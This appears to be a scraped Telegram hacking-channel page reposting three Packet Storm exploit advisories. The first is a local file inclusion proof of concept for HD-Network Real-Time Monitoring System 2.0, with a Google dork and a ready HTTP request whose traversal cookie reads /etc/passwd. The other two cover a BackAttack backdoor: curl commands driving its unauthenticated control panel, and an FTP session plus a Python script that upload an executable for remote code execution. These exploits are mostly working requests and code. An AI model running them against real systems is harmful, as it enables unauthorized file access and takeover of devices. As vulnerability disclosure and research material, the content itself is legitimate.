Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HD-Network Real-Time Monitoring System 2.0 Local File Inclusion

https://4.bp.blogspot.com/-dyIqvjR3K84/WWlvfXt5NkI/AAAAAAAAIQA/Fvmwfk3J4TgcxqdY3USv0_rN_ZW9VtW1ACLcBGAs/s1600/h85.png
HD-Network Real-Time Monitoring System version 2.0 suffers from a local file inclusion vulnerability.

MD5 | b04ad8d3c2ceb7d25b4c762053fdf528

Download
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server

Proof of Concept:

GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: VulnIP
Connection: Keep-alive


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BackAttack.20 Code Execution

https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Backdoor.Win32.BackAttack.20 malware suffers from a code execution vulnerability.

MD5 | 727ec61d4d6ef61d3f1d1caae2695804

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BackAttack.20
Vulnerability: Unauthenticated Remote Command Execution
Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can control an infected host. Third party-attackers who can reach the system can run commands made available by the malware E.g. take screenshot, restart the system, enable FTP or even destroy the backdoor etc. The web UI does not require authentication to execute these commands.
Type: PE32
MD5: 8b484576f928c256277016104cc364c2
Vuln ID: MVID-2021-0423
Disclosure: 12/11/2021

Exploit/PoC:
Show Skeleton
http://x.x.x.x/showskeleton

Show Sex
http://x.x.x.x/showsex

Whos logged on
curl http://x.x.x.x/whoisthere

Screen capture
curl http://x.x.x.x/capturescreen

Enable FTP
curl http://x.x.x.x/ftpon

Restart host
curl http://x.x.x.x/restart

Destroy the backdoor
curl http://x.x.x.x/destroyyes -v

Destroy action has been executed! -Restart procedure initiated also-

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.BackAttack.20 Authentication Bypass / Code Execution

https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Backdoor.Win32.BackAttack.20 malware suffers from bypass and code execution vulnerabilities.

MD5 | f6246f6defa5fc357e11c1a3628bfbf9

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BackAttack.20
Vulnerability: Authentication Bypass RCE
Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can enable its FTP server. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.
Type: PE32
MD5: 8b484576f928c256277016104cc364c2
Vuln ID: MVID-2021-0424
Disclosure: 12/11/2021

Exploit/PoC:
nc64.exe 192.168.18.125 21
220 httP://www.CurrenTChaoS.Tk - BackAtTack2.0 ftp server-
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,194,33).
STOR DOOM-SM.exe
150 Opening data connection for DOOM-SM.exe.
226 File received ok

from socket import *

MALWARE_HOST="192.168.18.125"
PORT=49697
DOOM="DOOM-SM.exe"

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)

while EXE:
s.send(EXE)
EXE=f.read()

s.close()

print("By Malvuln");

if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
2 Website Threats to Address for the Holiday Shopping Rush

Some tips for effectively combating Web supply chain attacks and customer hijacking via browser extensions.